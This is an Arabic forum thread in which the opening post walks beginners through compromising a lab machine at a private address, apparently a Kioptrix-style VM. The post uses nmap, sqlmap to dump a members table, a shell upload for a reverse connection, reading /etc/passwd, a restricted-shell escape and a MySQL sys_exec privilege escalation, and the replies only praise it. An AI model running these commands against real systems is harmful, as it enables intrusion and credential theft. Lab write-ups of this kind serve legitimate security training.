1. One MaN

    One MaN Developer

    الأنتساب:
    ‏22 أغسطس 2012
    المشاركات:
    86
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    PaLsTiNe - GaZa
    بسم الله الرحمن الرحيم

    اللهم انا نسالك علما نافع

    اللهم علمنا ماينفعنا وانفعنا بما علمتنا

    اليوم موضوعي بسيط للمبتدئين والطريق لاختراق الموقع والحصول على الروت

    بسم الله الرحمن الرحيم

    اول شي نبدا فيه هو فحص الاي بي بالان ماب عشان نشوف الخدمات اللي على الموقع

    [​IMG]

    مثل ماهو واضح الخدمات اللي شغاله ونقدر نشوف المنفذ 80 شغال يعني عليه موقع نفتح الموقع ونشوف وش مركب عليه

    [​IMG]

    نجرب علنا نلقا ثغرة في الموقع

    [​IMG]

    الحمدلله احتمال ثغرة سيكول انجكشن نجرب بالاداة sqlmap ونشوف وش النتيجة

    [​IMG]

    فعلا الثغرة موجودة وطلعت لنا قواعد البيانات

    الامر المستخدم


    كود PHP:
    sqlmap -"http://192.168.56.101/index.php" --forms --dbs

    نحاول نجيب كلمة المرور واسم المستخدم بنفس الاداة

    [​IMG]

    الامر المستخدم


    كود PHP:
    sqlmap -"http://192.168.56.101/index.php" --forms -D members -T members --dump
    نجرب نخش ونشوف يمكن نلقا مركز رفع

    [​IMG]

    للاسف مافيه شي

    نرجع نجرب الاداة nikto ونشوف وش النتيجة

    [​IMG]

    لقينا مجلد images وغالبا مايكون تصريحه قابل للكتابة نجرع sqlmap ونحاول نتصل اتصال عكسي

    [​IMG]

    لاحظوا المجلد اللي رافع عليه الشل وان شاء الله يقبل

    [​IMG]

    الحمدلله تم رفع الشل والاتصال

    الان نبي نشوف من اليوزرات ومن اللي له صلاحية الادمن

    ننفذ الامر cat /etc/passwd

    [​IMG]

    نشوف اليوزرات موجوده تحت وهي


    [SQL]loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
    john:x:1001:1001:,,,:/home/john:/bin/kshell
    robert:x:1002:1002:,,,:/home/robert:/bin/kshell[/SQL]


    طيب نشوف من في قروب الادمن منهم

    cat /etc/group

    [​IMG]

    نشوف اليوزر loneferret مضاف في قروب الادمن

    الان نحاول نتصل بقاعدة البيانات ونحاول نحط اليوزر جون اللي معنا الباسوورد تبعه في قروب الادمن

    نشوف

    [​IMG]

    كتبت الامر هذا عشان اشوف اليوزر والباسوورد المستخدم في قاعدة البيانات نستخدم المعلومات هذي للاتصال

    نتصل عن طريق البورت 22 من البيوتي او ssh اللي حاب

    [​IMG]

    الحمدلله الاتصال ناجح

    وكتبت الامر


    كود PHP:
    echo __import__('os').system("/bin/bash")

    لان الشل فيه ثغرة وبكذا نقدر نستخدمه كاستخدام الشل المحلي

    نخش على قاعدة البيانات

    [​IMG]

    الان ننفذ الامر


    كود PHP:
    select sys_exec('usermod -a -G admin john')

    [​IMG]

    نطلع من قاعدة البيانات ونشوف وش النتيجة

    [​IMG]

    الحمدلله تم ترويت السيرفر

    وهذي احدى الطرق والسيرفر فيه عدة ثغرات تقدر تجيب منها روت

    واعذروني على الشرح السريع​
     
  2. BLaCk HoLe

    BLaCk HoLe Developer

    الأنتساب:
    ‏9 أغسطس 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    In K.S.A
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    بارك الله فيك
    ونتظر منك الجديد
     
  3. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    \عاشت الايادي مبدع شرح كافي ووافي عشت:ُeُe$1:\
     
  4. D3VIL H4CK3R

    D3VIL H4CK3R Developer

    الأنتساب:
    ‏4 مايو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافيه ... تسلم ايديك ي حبيبي
     
  5. Black-Heart

    Black-Heart V • I • P

    الأنتساب:
    ‏24 مارس 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الإقامة:
    أطهر البقاع
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    بارك الله فيك حبيبي وشرح رائع ومفهوم
     
  6. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    عاشت ايدك اخوي :{1!}:
     
  7. AlKOrtanY

    AlKOrtanY Developer

    الأنتساب:
    ‏24 مايو 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافيه اخوي
     
  8. -AL SenatoOoR-

    -AL SenatoOoR- V • I • P

    الأنتساب:
    ‏14 أغسطس 2014
    المشاركات:
    803
    الإعجابات المتلقاة:
    29
    نقاط الجائزة:
    28
    الجنس:
    ذكر
    الإقامة:
    [[ الـــعرآق الــــعظيم ]]
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    عاشت ايدك يابطل استمر [​IMG]
    شرح مفوهم ومتعوب عليه ايضأ تم الوشم {1!9}
    لاتحرمنا من ابداعك:{3!}:​
     
  9. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    يعطيك العافية
     
  10. Resident Evil

    Resident Evil Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    46
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    my home
    رد: أختراق الموقع والحصول على الروت للمبتدئين

    تسلم لي على الشرح الجميل والمفيد
     

مشاركة هذه الصفحة